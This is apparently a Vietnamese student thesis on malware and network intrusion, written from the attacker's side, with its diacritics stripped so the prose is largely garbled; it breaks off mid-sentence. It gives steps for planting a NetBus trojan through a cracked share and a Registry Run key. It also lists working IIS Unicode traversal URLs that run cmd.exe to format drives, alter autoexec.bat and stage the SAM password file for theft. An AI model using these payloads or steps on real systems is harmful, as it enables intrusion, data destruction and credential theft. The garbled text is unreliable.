MC LC

KT LUN.........................................................................................................28

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

Li m u
Mc tiu ca vic ngi ta ni mng l nhiu ngi c th dng chung ti nguyn t nhng v tr a l khc nhau, chnh v th m cc ti nguyn s rt phn tn, dn n mt diu tt yu l d b xm phm gy mt mt d liu, thng tin. Cng giao thip rng th cng d b tn cng, l quy lut. Mi nguy c trn mng u c th nguy him: Mt li nh ca cc h thng s c li dng vi tn sut cao, li ln th thit hi ln ngay lp tc, tm li trn mt quy m rng ln nh Internet th mi khe h hay li h thng u c nguy c gy ra thit hi nh nhau. Theo CERT (Computer Emegency Response Team): 1989: c 200 v tn cng, truy nhp tri php trn mng c bo co. 1991: 400 v. 1993: 1400v. 1994: 2241 v. 1998: 3734 v. 1999: 9589 v 2000: 21756 v 2003: 137529 v 2005: 535000 v Nh vy s v tn cng ngy cng gia tng, mt khc cc k thut ngy cng mi. iu ny cng d hiu, mt vn lun lun c hai mt i lp. Cng ngh thng tin, mng Internet pht trin nh v bo th tt yu cng ko theo nn trm cp, tn cng, ph hoi thng tin trn mng.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet V vy vn tm hiu cc cch thc m bn ti phm thng s dng tn cng, ph hoi cc mng my tnh dng ring khi c kt ni Internet quc t l iu quan trng v cn thit. Trn c s ngi ta c c bin php phng c hiu qu. ti: Tm hiu mt s phn mm ph hoi v cc gii php xm nhp mng dng ring c xut v thc hin nhm mc ch tm hiu mt s phn mm ph hoi v nghin cu mt s gii php xm nhp mng dng ring hin ang c ng dng rng ri. Kt qu nghin cu ca em gm 4 chng v phn kt lun. Chng 1: Mt s phng php tn cng v k thut xm nhp mng my tnh Chng 2: Mt s nguyn tc tn cng trn mng my tnh Chng 3: Phn tch mt s phn mm mu Chng 4: Mt s gii php c th tn cng trn mng my tnh Trong em tp trung i su vo 2 chng l chng 3 v chng 4. Vic tm hiu phn tch cc gii php tn cng trn mng l vn rt kh khn, c bit i vi em. Do , d em c nhiu c gng nhng mt mt do thi gian v kin thc ca em cn nhiu hn ch, mt khc cc ti liu tham kho li ch yu bng ting Anh v ting Php cho nn kt qu tm hiu, nghin cu ca em cha su sc v ton din. Em rt mong c s ch bo ca cc thy, c v cc bn ng nghip. Em xin chn thnh cm n.

Sinh vin V Th Thu Hng

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

Chng 1 MT S PHNG PHP TN CNG V K THUT XM NHP MNG

1.1 Thc trng tn cng ca ti phm trn mng Vi s pht trin mnh m v s nh hng rng ri ca Internet khin cho mng my tnh sinh ra mt tng lp mi - nhng tay hacker (l nhng ngi c nim am m rt ln i vi my tnh,vi cng ngh thng tin). Hacker c chia lm hai phi: hacker m trng(white-hat hacker) v hacker m en (black-hat hacker). Phn ln cc cuc tn cng trn mng c thc hin thng qua vic s dng mt hoc nhiu cng c phn mm. Trong n ny em nghin cu cc phn mm ph hoi. Phn mm ph hoi l nhng phn mm c thit k, xy dng nhm mc ch tn cng gy tn tht hay chim dng bt hp php ti nguyn ca my tnh mc tiu( my tinh b tn cng ). Nhng phn mm ny thng c che du hay ngy trang nh l phn mm hp l, cng khai hoc b mt thm nhp vo my tnh mc tiu. Nhng phn mm ph hoi khc nhau c phng thc v nguy c gy hi khc nhau. Cc v tn cng trn mng ngy cng gia tng c v quy m v tnh cht nguy him. Trong tng lai, nhng k vit virus c th gia tng kh nng iu khin ln virus ca mnh sau khi pht tn chng trn mng. Ngy cng nhiu su my tnh c cha backdoor v tc gi ca chng c th nng cp mt cch trc tip vt qua cc phn mm dit virus hay b sung thm tnh nng. Hn na, su my tnh cn c kh nng t thit lp cc knh lin lc ring gia chng tp hp li v nng cp. iu ny khng ch gip chng trnh khi s pht hin ca cc chng trnh dit virus m cn gia tng ng k sc tn ph. Ngy nay, vn tn cng trn mng khng cn ch l tr chi ca gii hacker m nhiu quc gia tn dng kh nng ny phc v cc v ch Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP 4

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet chnh tr, qun s. nhiu quc gia, nht l cc quc gia pht trin, my tnh c ng dng mi ni, mi lnh vc, trong an ninh quc phng, v vy nhng kh nng gy phng hi cho i phng bng cc hot ng tn cng trn mng vin thng - tin hc l v cng to ln. Hin nay cc nc u c cc: Cc tc chin in t trn mng. Hng nm cc nc ny chi ra hng trm triu USD phc v cho vic nghin cu ny nh Trung Quc, i Loan, Hn Quc, Thi Lan, v.v (Theo tp ch khoa hc Australia, s 9 nm 2005 ) Tn cng trn mng nhm vo mt h thng my tnh y l nhng hnh ng nhm lm nh hng n s n nh ca h thng, truy nhp bt hp php n cc ti nguyn ca h thng, lm sai lch hoc ly hoc ly cp thng tin Tn cng trn mng l vn kh. Vic tn cng c th thc hin c hay khng c m bo thnh cng hay khng ph thuc vo rt nhiu yu t. - V khch quan, n ph thuc vo h thng ngi ta nh tn cng. - V mt ch quan, n ph thuc vo kh nng ca ngi tn cng. Cc cng c s dng tn cng l mt thnh phn ht sc quan trng. Ngi ta c th s dng cc cng c c sn (vn c kh nhiu ) hay t to ra cng c mi tu theo mc ch, phc tp v hiu qu mong mun. ginh thng li trong mt cuc tn cng c rt nhiu kh khn. Nhng iu l hp l bi i phng, khi bo v h thng ca h, cng nh ngi ta lun c gng cao nht m bo an ton cho mnh. V kh c th thnh cng nu thiu i vic tm hiu i phng v chun b chu o t pha ngi ta. Thng phi s dng nhiu phng php tng hp, k c cc bin php t chc ln cc gii php cng ngh. Mt s phng php tn cng v k thut xm nhp mng quan trng nh sau: 1.2 Cc phng php tn cng 1.2.1 Tn cng trc tip Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP 5

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet 1.2.2 Nghe trm 1.2.3 Gi mo a ch Hai dng tn cng da trn vic gi mo a ch l: - Gi mo a ch my gi (Source addres). - K trung gian (Man in the middle). 1.2.4 V hiu ho cc chc nng ca h thng mc tiu - T chi dch v (DOS Denial of Service). - T chi dch v mng (Network denial of service). 1.2.5 S dng li ca ngi qun tr h thng 1.3 Cc k thut xm nhp mng 1.3.1 Rnh m (Snooping) 1.3.2 nh la (Spoofing) 1.3.3 ip vin (Agent)

Chng 2. MT S NGUYN TC TN CNG TRN MNG

2.1 Pht hin im yu trong c ch bo mt ca i phng. Mun thc hin tn cng thnh cng mt mc tiu phi tm hiu, nghin cu rt k mc tiu . Mt h thng m bo an ninh an ton my tnh thng bao gm mt s yu t chnh sau y: - Yu t t chc. - Yu t k thut, cng ngh. Mc ch ca cng tc d tm mc tiu l bng cc bin php khc nhau pht hin nhng im yu trong h thng bo mt (v mt t chc v k thut cng ngh) quyt nh s dng gii php tn cng hp l, ci cm ip vin vo my i phng.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Mi h thng my tnh u c cc im yu - cc l hng bo mt. D tm c cc l hng bo mt ny l mt bo m quan trng cho vic thng li ca vic tn cng. Tuy nhin vn rt quan trng v thit yu t ra l tm u cc l hng v bng cch no. C hai hng tip cn, mt l v gc chin thut v hai l t gc k thut. Mt s din n trao i v li bo mt: din n Bugtraq (http://Packetstorm.secuify), din n Tlsecurity (http://www.tlsecurity.net), din n hackerVN (http://www.hackerVN.net), 2.2 Trit li dng ca sau tn cng. Ca sau (Backdoor) l mt cng c ph bin trong gii hacker. Vic t nhp vo mt h thng my tnh no ni chung l rt kh khn, v th sau khi t nhp ngi ta mun li mt cng c no gip d dng xm nhp trong nhng ln sau. Backdoor sinh ra l p ng yu cu . Tm li Backdoor / Trojan c hiu nh l: - Mt chng trnh tri php (thng np di tn ca mt chng trnh hp l) thc hin cc chc nng m ngi s dng khng bit n cng nh khng mong mun. - Mt chng trnh hp l nhng b ci mt s on m bt hp php, cc on m ny thc hin cc chc nng m ngi s dng khng bit n cng nh khng mong mun. Nguyn tc hot ng ca Backdoor kh n gin: Khi chy trn my ch n c gng khng gy bt k iu g kh nghi v m thm thng trc trn b nh, m mt cng hu cho php ngi tn cng kt ni v iu khin my . Vi nguyn l hot ng nh vy Backdoor cn c gi l cng c qun tr t xa (RAT Remote Administrastor Tool). Nh vy mt Backdoor in hnh gm hai thnh phn: Thnh phn Server nm trn my ch. Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP 7

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Thnh phn Client nm trn my tn cng

My tn cng

Giao tip bnh thng Giao tip ca sau

My ch
Back

Back

Hnh 3.1.1:M hnh hot ng ca backdoor Tn cng bng Backdoor cn c bit ch hai vn : Backdoor mnh phi c thnh phn Server nh, gn, c kh nng thc thi nhiu chc nng vi tc cao trnh gy nghi ng. Server cn c kh nng ngy trang n np kn o khng b pht hin. C vi gii php thng dng thc hin: Thit k Backdoor c chc nng sa nhng tham s dng lnh ca chnh n khi chy mang mt tn (hp l) khc. Backdoor c chc nng sa mt s thng trnh trong cc th vin h thng n khng thc hin mi tin trnh ang thc thi, trong c tin trnh ca Backdoor server. Backdoor c gn vi thng trnh iu khin ngt khin n khng hin trong bng tin trnh. Ngi tn cng c th sa nhn h iu hnh ch n i nhng tin trnh nht nh (trong trng hp ny l tin trnh Backdoor server). Chc nng ca mt Backdoor c qui nh trong thnh phn server. Cc chc nng thng gp l: Keylogging (bt trm phm). Screen capturing (chp nh mn hnh).

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Password stealing: Ly trm cc loi password . File downloading: Cho php download mt hay nhiu file t my mc tiu. File uploading: Cho php upload mt hay nhiu file ln my ch. Running application (thc thi ng dng). File managing (qun l file). Post redirecting (nh hng li cng). Hin nay trn mng c rt nhiu loi Backdoor khc nhau v ngy cng c nng cp. Mt s danh sch Backdoor in hnh: Netbus. Back Orfice. Ngoi ra cn c cc Backdoor khc cng nguy him khng km nh Hack attack, Girlfriend, Netthief, Netspy, NetMonitor, Socket de Trojen (Php) Tm li Backdoor l mt cng c tn cng hu hiu c th khai thc trit phc v nhng yu cu chin lc ca ngi ta v cng l v kh nguy him ngi ta cn phng khng ngi khc li dng tn cng mnh. 2.3 Tn dng cc cng c sn c. S dng ti a kh nng ca cc cng c l nguyn tc thit yu trong qu trnh thc hin tn cng trn mng. Cc cng c thng c s dng n gin ha nhng tc v nht nh trong qu trnh chung nhm nng cao tc , m bo hiu qu cng vic tn cng. T cc cng c do chnh h iu hnh cung cp ti nhng cng c do hng th hai, cc nhm chuyn v bo mt, cc hacker hoc cc t chc hacker qung b, tt c u c th s dng vo cuc tn cng, min l cch khai thc hp l, kt hp cc cng c mt cch hiu qu. Cch s dng cc cng c cy Trojan ln mt my khc thng qua chia s ti nguyn trn my . Ngi ta mun c mt ti liu quan trng c lu a

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet D: v khng share full a C: my mc tiu. Tuy nhin, thc hin trao i thng tin vi cc my khc, a C: c share vi mt khu, mt khu ny c thay i thng xuyn. C th chim ot cc vn bn trn bng cch trc tin s dng mt cng c b kha chia s Passware Kit (http://www.LostPassword.com). Cng c ny b kha lm vic rt nhanh v hiu qu, trong phn ln trng hp n s tm ra mt khu chia s ti nguyn trong vng mt vi pht ty thuc vo phc tp ca mt khu. Sau , ta ch vic copy file server ca Netbus 1.7 (patch.exe) vo th mc bt k C:, gi s C:\windows\. Tip theo kch hot Netbus, ta phi dng n dch v Remote Registry Service ca Windows sa i Registry my ch lm cho file patch.exe t ng chy t ln khi ng tip theo. Khi dch v ny c ci t trn my ch, ta c th s dng regedit.exe ca Windows np v sa i Registry my . Thm vo mt kha HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Version\Run hoc HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current\Version\Run chy patch.exe: Value type: String Value name: Patch Value t C:\windows\patch.exe Ln sau khi my mc tiu hot ng, chng ta chy Netbus client trn my mnh, connect vo v lm c rt nhiu iu theo kh nng ca Netbus server. 2.4 Khai thc ti a im yu ca mc tiu tn cng c bit cc l hng ca h thng v cc dch v. L hng bo mt l nhng li trong mt h thng m ngi khc c th tn dng thc hin nhng cng vic vn khng c h thng cung cp v thng l dng vo mc ch tn cng. Trn thc t, t h iu hnh, trnh duyt Web, cc h c s d liu, thm ch ngay c chng trnh dit virus, tt c t nhiu u c li. Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP 10

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Bng lit k mt s sn phm c nhiu l hng nht. STT 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 Tn sn phm Microsoft Internet Explore Microsoft Windows 98 Microsoft Windows 95 Microsoft Outlook Netscape Navigator Microsoft Outlook Express Microsoft Windows ME Microsoft Excel Microsoft Word Qualcomm Eudora Symantec Norton Anti Virus AOL instanl Messenger Mirabilis ICQ Sun Java Microsoft Powerpoint S l hng bo mt 69 35 30 28 22 16 10 10 9 8 7 6 6 5 5

Hnh 2.3.1: Danh sch mt s phn mm nhiu l hng bo mt nht (Ngun: www.securityfocus.com thng 11/2001) Trong n ny em xin trnh by c th phng php tn cng IIS server bng cch li dng li Unicode: C th xem ni dung a C: trn ci IIS server 5.0 bng URL sau khi g thanh address ca trnh duyt, gi thit rng a ch trang web l http://www.iisaffected.com, mc d vn c mt thng bo li CGI: %c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ Cng nh rt nhiu loi web server trc y nh Compaq insight Manager 4.x, MS Index Server 2.0, HP JetAdmin 5.6, IIS server b mc mt li gi l dot dot directory traversal attack (tn cng bng cch ln ngc th mc do li dot dot). Khi mt trong cc loi server trn nhn mt xu URL c cha cc xu con ../ (hoc ..\ ty loi server) th mi xu con ny chuyn ng dn hin thi server ln mc cha ca n (tng ng vi cu lnh cd.. ca DOS) v dn dn ra ngoi th mc web - iu ny vn khng hp l. http://www.iisaffected.com/scripts/..

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

11

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Kt hp vi mt ng dn thch hp pha cui URL, n cho php ngi tn cng thc thi lnh no trn my ch web. IIS server v mt s web server sa li bng cch kim tra URL thanh a ch ca trnh duyt v t chi, khng cho php thc thi nu nh trong cha xu con ../ hay ..\. Tuy vy, hacker sng to ra th thut dng unicode lt qua ch phng v ny. Chun unicode t Ver. 2.0 tr ln cho php mt k t c nhiu m ha khc nhau, y chnh l ni li dng. Cch m ha nh vy c gi l m ha unicode rt di (unicode very long representation). Khi nhn mt URL, mt server tt phi ngn chn cc cch m ha di ny m ch cho php mt cch m ha chun. Tuy nhin, IIS li khng lm nh vy, khi nhn mt URL trc tin n kim tra s tn ti trc tip ca cc xu con /, \ v cc m ha Unicode thng thng (ng vi mt biu din unicode ngn nht) ca cc xu con y. Nu tn ti cc xu nh vy, IIS s t chi truy nhp y chnh l cch m IIS t bo v trc kiu tn cng dot dot directory traversal attack. Ngc li, IIS s thc hin yu cu trong URL v lc ny IIS mi gii m cc m ha di ca k t gch cho (slash / v backslash \) trong URL v tt nhin, chng tr thnh cc k t / v \ m IIS khng kim tra c na. Do vy, thay v a xu con ../, ..\ vo thanh a ch, ngi ta thay n bi xu unicode cha mt on m ha rt di ca k t / \ nh %c1%1c, ..c0%f9, ..e0%80%af%, ..%fc %80%80%80%80%af,th IIS s b nh la v cho rng l mt URL hp l, c quyn thc thi. Kt hp vi nhng thit lp ci t ngm nh trn my ch, y chnh l cch thc thi hnh nhng lnh ca ngi ta m server vn cho l hp l. Do %c1%1c l mt biu thc unicode rt di ca k t / m IIS khng nhn ra, dng lnh trn ginh c quyn thc thi. Khi thc thi, xu %c1%1c c dch tr li nguyn dng k t / (nhng IIS qua khu kim tra nn khng thc hin kim tra li ) v a ch truy cp thc cht tr thnh: Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

12

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet http://www.iisaffected.com/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\ n y, li kinh in dot dot directory traversal attack xut hin v nm ngoi kh nng t bo v ca IIS. URL trn vi hai xu con ../ iu chnh th mc cha URL http://www.iisaffected.com/scripts/ ( theo ngm nh l: C:\inetpub\scripts) ln hai mc th mc cao hn, tc l ra ngoi th mc ginh cho web (vn khng c php), tr v th mc gc C:. Phn tip theo trong URL gn tip vo ng dn n trnh thng dch lnh ca Windows NT theo ch ngm nh (winnt/system32/cmd.exe) v thc hin lnh dir C:\ lit k ni dung a C:. Do c nhiu cch biu din dng Unicode rt di ca k t / v \ cng nh c kh nhiu thit lp ngm nh khi ci t Windows NT v IIS nn t hp chng li s to nn nhiu URL khc nhau dng xm nhp. Bng di y lit k mt s URL ph bin: STT 1 2 3 4 5 6 7 8 9 URL /scripts/..%0%af../winnt/system32/cmd.exe?/c+ /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ /scripts/..%c1%fc../winnt/system32/cmd.exe?/c+ /scripts/..%c0%9c../winnt/system32/cmd.exe?/c+ /scripts/..%c0%9f../winnt/system32/cmd.exe?/c+ /scripts/..%c1%9a../winnt/system32/cmd.exe?/c+ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ /scripts/..%c1%af../winnt/system32/cmd.exe?/c+ /scripts/..%e0%af../winnt/system32/cmd.exe?/c+ Hnh 2.3.2. Mt s URL dng khai thc li Unicode trn IIS Bng cch trn, ngi ta ang nm rt nhiu quyn i vi h thng. Ngi ta c th xem ni dung a, ni dung mt s file quan trng, xa d liu trn a cng v thm ch format li a ch bng cc lnh ca DOS. Tip tc s dng URL trn, xem ni dung mt file, gi s autoexec.bat ta g trnh duyt: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+type+c:\autoexec .bat format li a C:, ta g:

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

13

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+format+c:\+/q Ta cng c th chim quyn ghi a v thc hin sa i, to mi file trn server. Truy cp trc tip bng cmd.exe khng cho php iu ny nhng nu ta to mt bn sao khc ca trnh thng dch v s dng bn sao ny th iu li c cho l hp l. Thc hin chin thut ny thng qua cc lnh sau : + Bc 1: To mt bn sao mi cmd1.exe ca trnh thng dch lnh DOS: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/win nt/system32/cmd1.exe + Bc 2: Ghi thm mt s lnh vo file autoexec.bat: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+echo+>>+c:\autoexec.bat+@echo+Hihi hi,KO n y, ngi ta hiu bn cht ca li unicode trn IIS v phng php c th khai thc li ny. Cn phi nhn mnh rng y l mt li bo mt rt nghim trng v cc l do sau: + D dng khai thc. + Tim n nguy c ngi tn cng c ton quyn iu khin h thng. Hin nay Microsoft a ra cc bn patch sa li trn. Vi IIS server 4.0, bn sa li c phn phi qua a ch: http://www.microsoft.com/ntserver/nts/downloads/critical/q269862 Cn vi IIS server 5.0, a ch sa li l: http://www.microsoft.com/windows2000/downloads/critical/q269862 2.5 Nguyn tc an ton.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

14

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Nhim v ca ngi ta khi tn cng l khng i phng bit c gi tin gc, hay a ch ngun gi tin khng phi a ch my ca ngi ta. Mt phng php n gin v hiu qu l s dng cc procxy v danh (Anonymous Proxy Server). Gi yu cu Gi yu cu My ca ta Tr li Proxy Tr li My i phng

Hnh 3.5.1: M hnh giao tip gia hai my thng qua proxy. lun c nhng thng tin v cc proxy min ph, c th thng xuyn truy cp cc trang web http://www.blackcode.com hoc http://www.freeproxies.com. Ngoi ra, c th s dng mt s chng trnh nhm to ra cc proxy o ngay trn my ca mnh. Mt chng trnh tiu biu trong s l chng trnh Anomity 4 proxy. 2.6 Nguyn tc phi hp tn cng Trong qu trnh thc hin tn cng, tu theo i tng tn cng v cng c c trong tay, ngi ta c th s dng nhiu bin php khc nhau, theo cc trnh t khc nhau t c kt qu cao nht. S sau th hin th t in hnh ca vic p dng cc nguyn l Ngy trang vo vic thc hin mt cuc trnh by tn cng c th: Khm ph im yu, l hng bo mt trong h thng mc tiu S dng cc cng c khai thc cc im yu ca h thng mc tiu Tin hnh cc bin php tn cng, thu thp thng tin To ng ngm (ca sau), ci cm ip vin nu c th Sinh vin:V Th Thu Hng - Lp CT 702 -du vt H DLHP Xa Trng Hnh 3.6.1: S th t p dng cc nguyn l tn cng 15

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

Chng 3. PHN TCH MT S PHN MM MU

3.1 NETBUS 3.1.1 Khi nim Netbus l mt cng c qun tr, iu khin t xa my tnh mc tiu (my cn tn cng) trong cng mng hoc trn Internet. 3.1.2 Cu trc Netbus gm hai phn: Thnh phn server v thnh phn client. 1. Thnh phn server, Patch.exe 3.1.3 Cc bc s dng Bc 1: Khi ng Bc 2: Kt ni Bc 3: Thc hin cc chc nng , ci trn my mc tiu. 2. Thnh phn client, Netbus.exe, chy trn my ca ngi ta (my tn cng)

Mn hnh giao din ca thnh phn client (netbus.exe) 3.1.4 Hng dn s dng

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

16

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet 1. iu khin truy nhp thnh phn server Server admin

2. ng m a CD - ROM Open/Close CD-ROM 3. Hin nh Show Image

4. Thay i chc nng cc phm chut Swap mouse 5. Thi hnh chng trnh trn my mc tiu Start program 6. Hin hp thoi Msg manager

7. Xem mn hnh my server Screendump 8. Xem thng tin my mc tiu Get info

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

17

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

9. Chy file nhc Play sound

10. iu khin my mc tiu Exit windows

11.Gi thng bo Send texts 12. Kch hot/ng ca s - Active windows

13. t v tr con tr chut Mouse pos 14. Nhn phm nhp vo ca ngi dng trn my mc tiu Listen

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

18

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

15. Ghi m thanh t my mc tiu Sound system. 16. iu khin chut - Control mouse 17. M mt trang Web Go to URL 18. iu khin bn phm Key Manage

- Chn Disable keys nhp vo cc phm cn v hiu ha, khi s xut

hin ca s sau: 19. Lm vic vi cc file File manage

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

19

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet 3.2 WS_Ping ProPack (http://www.ipswitch.com)

WS_Ping ProPack l mt tp hp cc cng c chun on v thng tin mng Internet. Info cung cp thng tin (bao gm tn my ch, a ch IP, thng tin lin h, tnh hiu qu ca mng) v mt my ch hay mt thit b mng c th. Time ng b ha ng h my tnh cc b ca bn vi thi gian ca server t xa v cho bn truy vn thi gian ca nhng server v so snh nhng kt qu . HTML l mt cng c chun on cho bn truy vn a ch trang web (URL) v c th xem c y thng tin v phn header v d liu trang tr li bi server HTTP. Ping l mt cng c chun on mng xc nhn kt ni n h thng c bit trn mng. Traceroute l cng c chun on mng bn d theo v nhn thy hng i thc ca mt gi tin IP ti my ch trn mng Internet.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

20

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Lookup truy vn nhng server min trn Internet a ra thng tin v host v nhng server tn min khc. Finger truy vn mt s server trn Internet c thng tin v user

ng k trn server (cung cp mt Finger server ang chy trn host t xa). Whois truy vn c s d liu ti NICs (Network Information Centers) v thng tin trn cc mng, cc host, user ca bt c t chc no ng k vi NIC. LDAP truy vn nhng th mc m s dng chun LDAP trn Internet. Rt nhiu t chc s dng LDAP to nn thng tin v user (nh cc tn v a ch th in t) c th trn Internet v Intranet ca h. Quote a ra nhng trch dn t Quote server. Scan tm kim mt mng c th v lit k cc host dng TCP/IP m n tm thy. Scan cng c th xc nh cc dch v (nh FTP, HTTP) trn mi host v lit k nhng cng hot ng trn mi host. Scan c th a ra mt tm lc nhanh chng v ci g trn mng ca bn v dch v mng no ang chy. SNMP truy vn nhng gi tr trn nhng thit b thc hin giao thc qun l mng n gin (Simple Network Management Protocol). SNMP c th cung cp mt ci nhn gn nht v cc host v cc thit b trn mng ca bn bi vic cung cp thng tin trng thi v cu hnh v h thng hin thi. WinNet qut mng cc b ca bn v lit k cc thit b mng Microsoft Windows v cc ngun ti nguyn chia s. Throughput kim tra tc truyn d liu ga my tnh ca bn v my tnh t xa. About hin th thng tin mng v my tnh cc b ca bn v mng cc b ca bn, cng nh thng tin v WS_Ping ProPack.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

21

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet

Chng 4. MT S GII PHP C TH TN CNG TRN MNG MY TNH

4.1 TN CNG MY MC TIU BNG CCH GINH QUYN IU KHIN H THNG . nm quyn iu khin server, ngi ta phi chim c quyn download v upload file. Mun thc hin iu ny, ta cn tm hiu trc ht v mt s giao thc s dng trong qu trnh giao tip mng hiu v ng dng vo vic tn cng. 4.1.1 Giao thc HTTP HTTP (HypeTtext Transfer Protocol giao thc truyn siu vn bn) l giao thc chun trn mng ton cu cho php truyn cc siu vn bn vi cc th (tag) khc nhau. y l giao thc hot ng da trn c ch yu cu/tr li (request/response). Giao thc HTTP thng c thc hin thng qua kt ni TCP/IP v khng yu cu thng tin xc thc, v vy n c coi l mt giao thc v danh. Cc phng thc thng xuyn s dng trong giao thc HTTP l POST, GET v HEAD. 4.1.2 Giao thc TFTP TFTP (Trivial File Transfer Protocol giao thc truyn file n gin) c thc hin trn nh giao thc UDP (User Datagram Protocol). TFTP cho php trao i, di chuyn file trn mng c s dng giao thc UDP. c thit k nhm vo s nh gn v tnh d s dng, TFTP thiu nhiu c trng ca giao thc FTP giao thc truyn file chun, iu duy nht TFTP cho php l c ghi file gia cc my xa m khng th hin danh sch th mc hay cung cp chng thc quyn cho ngi s dng. Giao thc TFTP t mnh thc hin truy cp v cng ng vic gii quyt vn quyn hn i vi cc file.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

22

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet 4.1.3 Giao thc NetBIOS NetBIOS (Network Basic Input/Output System) l mt dch v giao tip tng session trong m hnh OSI 7 tng. Dch v ny cho php ngi s dng chia s ti nguyn trn my mnh cho mi ngi trong mng cng s dng nh cc file, th mc, a, my in thm ch c cng COM. Giao thc ny cn c gi l chun SMB(System Messege Block). Cc mng da trn SMB s dng mt s giao thc c c s t giao thc NetBIOS hn nh NetBIOS over NetBEUI ( NetBIOS Extended User Interface - giao din ngi dung m rng trong NetBIOS ) v NetBIOS over TCP/IP. Nh vy, NetBIOS cung cp cc ng dng v giao din lp trnh cho cc dch v chia s ti nguyn thng qua mt s giao thc cp thp hn, bao gm c giao thc TCP/IP. V giao thc NetBIOS over TCP/IP chy trn h giao thc TCP/IP l h giao thc chun trn Internet, ngi ta c th chia s ti nguyn ngay c trn Internet. Nu my ch ngi ta nh tn cng ci t giao thc NetBIOS over TCP/IP. Ta c th li dng iu ny tn cng, nht l khi khai thc c li unicode trn h thng . By gi ngi ta s i vo c th, tm cch download v upload file trn IIS mc li Unicode. Theo ngm nh, khi ci IIS phin bn t 4.0 tr ln, mt FTP server s c t ng ci t vo h thng. FTP server cho php ngi s dng v danh truy cp vo th mc \inetpub\ftoproot\ v download cc file t (nhng khng cho php upload file). Li dng iu ny, download mt file no trn my ch mc li unicode, ta thc hin hai bc sau: + Bc 1: Copy file download (gi s l file c:\system.ini) vo th mc \inetpub\ftoproot\ bng URL: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftoproot\ + Bc 2: S dng FTP v danh ng nhp vo my tnh ch download file system.ini v.

Sinh vin:V Th Thu Hng - Lp CT 702 - Trng H DLHP

23

Tm hiu phn mm ph hoi v cc gii php xm nhp mng dng ring c kt ni Internet Kt hp vi lnh dir trnh by trn (Mc 3.4), phng php ny cho php ta ly c hu ht file quan trng trn server b tn cng, y c th ni l mt thnh cng ln i vi ngi tn cng. Tuy nhin phng php ny b hn ch ch n khng cho php download tt c cc file. C th, ngi ta bit rng Windows NT v Windows 2000 lu tr mt bn sao file SAM (Security Account Manager) trong th mc \WINNT\repair\, trong lu tr thng tin v account s dng h thng bao gm Username v Password c m ha. Nu copy c file ny, ta s dng chng trnh b kha gii m n v tr nn c ton quyn i vi Website, mt cch chnh quy. Tuy nhin lnh copy file SAM ny khng thc hin c. Nu g vo thanh a ch dng lnh: http://www.iisaffected.com/scripts/.. %c1%1c../winnt/system32/cmd.exe?/c+copy+c:\WINNT\repair\SAM+c:\inetpu b\ftoproot\ trnh duyt s bo li: CGI Error The specified CGI application misbehaved by not returning a complete set HTTP headers. The headers Internet did return are: Access is denied. 0 file (s) copied. Vn nm ch vt ra 